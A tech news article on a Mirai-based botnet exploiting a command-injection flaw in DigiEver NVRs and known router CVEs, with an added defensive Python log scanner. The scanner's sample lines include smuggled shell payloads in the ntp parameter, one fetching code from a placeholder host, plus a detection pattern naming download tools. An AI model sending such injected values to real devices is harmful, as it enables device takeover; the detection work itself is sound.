Technology

Alarming New Botnet Takes Aim at NVRs and TP-Link Routers—What You Need to Know!

2024-12-24

Author: Siti

A newly discovered botnet, based on the notorious Mirai framework, is wreaking havoc by exploiting a remote code execution vulnerability in DigiEver DS-2105 Pro NVRs. The vulnerability has no assigned tracking identifier and remains unpatched, which makes it a significant threat to users of these devices.

This malicious campaign was initiated in October, focusing on a range of network video recorders and TP-Link routers running outdated firmware. Notably, one of the vulnerabilities being exploited was highlighted by TXOne researcher Ta-Lun Yen during last year’s DefCamp security conference in Bucharest, Romania. At that time, Yen cautioned that the flaw affects a variety of digital video recorder (DVR) devices.

How It Works

According to researchers at Akamai, the botnet began exploiting the DigiEver vulnerability around mid-November, although evidence suggests its activity dates back to September. The malicious actors are leveraging a serious remote code execution (RCE) flaw in the handler for the /cgi-bin/cgi_main.cgi URI, which fails to validate user input properly.

As a result, attackers can inject commands such as 'curl' and 'chmod' through specific parameters, including the ntp field of an HTTP POST request. Once executed, this command injection lets the attackers fetch malware from an external server and add the compromised device to their botnet.

Importantly, once an NVR is compromised in this way, it can be weaponized for distributed denial of service (DDoS) attacks and may even spread to other vulnerable devices using exploit sets and credential lists.
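As an added illustration of how a defender might spot the injection pattern described above in web-server or reverse-proxy logs (this is not code from the article or from Akamai's report): the log format, the sample lines and the placeholder hostname are all constructed for the example, and the check simply flags POSTs to /cgi-bin/cgi_main.cgi whose ntp value is anything other than a plain hostname or IP address.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines in a hypothetical "METHOD PATH BODY" format.
# "-" stands for an empty request body; hosts are placeholders, not real IoCs.
SAMPLE_LOG = """\
POST /cgi-bin/cgi_main.cgi ntp=0.pool.ntp.org&tz=UTC
POST /cgi-bin/cgi_main.cgi ntp=0.pool.ntp.org%3Bcurl+http%3A%2F%2Fmalware.invalid%2Fa%3Bchmod+777+a
GET /index.html -
POST /cgi-bin/cgi_main.cgi ntp=time.example.com%24%28uptime%29
"""

SHELL_META = re.compile(r"[;|&`$(){}<>\n]")              # characters a shell would interpret
SUSPICIOUS_CMDS = re.compile(r"\b(curl|wget|chmod|sh|busybox|tftp)\b", re.I)
NTP_HOST = re.compile(r"^[A-Za-z0-9.\-]{1,253}$")         # what a legitimate ntp value looks like


def parse_line(line):
    """Split one constructed log line into method, path and decoded form parameters."""
    method, path, body = line.split(" ", 2)
    params = {}
    if body != "-":
        for pair in body.split("&"):
            key, _, value = pair.partition("=")
            params[unquote_plus(key)] = unquote_plus(value)
    return method, path, params


def classify_ntp(value):
    """Return the reasons an ntp value looks like command injection; empty list if benign."""
    reasons = []
    if SHELL_META.search(value):
        reasons.append("shell metacharacter")
    if SUSPICIOUS_CMDS.search(value):
        reasons.append("command keyword")
    if not NTP_HOST.match(value):
        reasons.append("not a plain hostname/IP")
    return reasons


def find_suspicious(log_text):
    """Yield (line number, decoded ntp value, reasons) for POSTs to the vulnerable CGI."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        method, path, params = parse_line(line)
        if method != "POST" or path != "/cgi-bin/cgi_main.cgi" or "ntp" not in params:
            continue
        reasons = classify_ntp(params["ntp"])
        if reasons:
            hits.append((lineno, params["ntp"], reasons))
    return hits
```

Because the whole sample is decoded before matching, URL-encoded separators such as %3B are caught as well; a device that is still exposed should be patched or isolated rather than merely monitored.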

Targeting Multiple Vulnerabilities

In addition to the DigiEver flaw, this evolving Mirai variant is also taking aim at CVE-2023-1389, a known vulnerability affecting TP-Link devices, and CVE-2018-17532, which affects Teltonika RUT9XX routers.

Akamai researchers have noted that this new variant distinguishes itself through the use of XOR and ChaCha20 encryption. While advanced encryption methods aren't entirely new to botnets, they're indicative of an evolution in tactics among Mirai-based operators. This is a significant shift as many existing Mirai botnets still rely on older, less sophisticated string obfuscation methods drawn from the original Mirai malware source code.

Stay Vigilant

As cyber threats become more sophisticated, it’s crucial for users to stay informed and proactive. Checking for device updates and applying patches promptly can help mitigate these vulnerabilities. Indicators of compromise (IoCs) connected with this botnet surge are available in Akamai's detailed report, which also includes YARA rules for detecting and blocking this emerging threat.

In a world where threats from malicious botnets continue to evolve, it’s critical to take preventive measures—don’t become the next victim!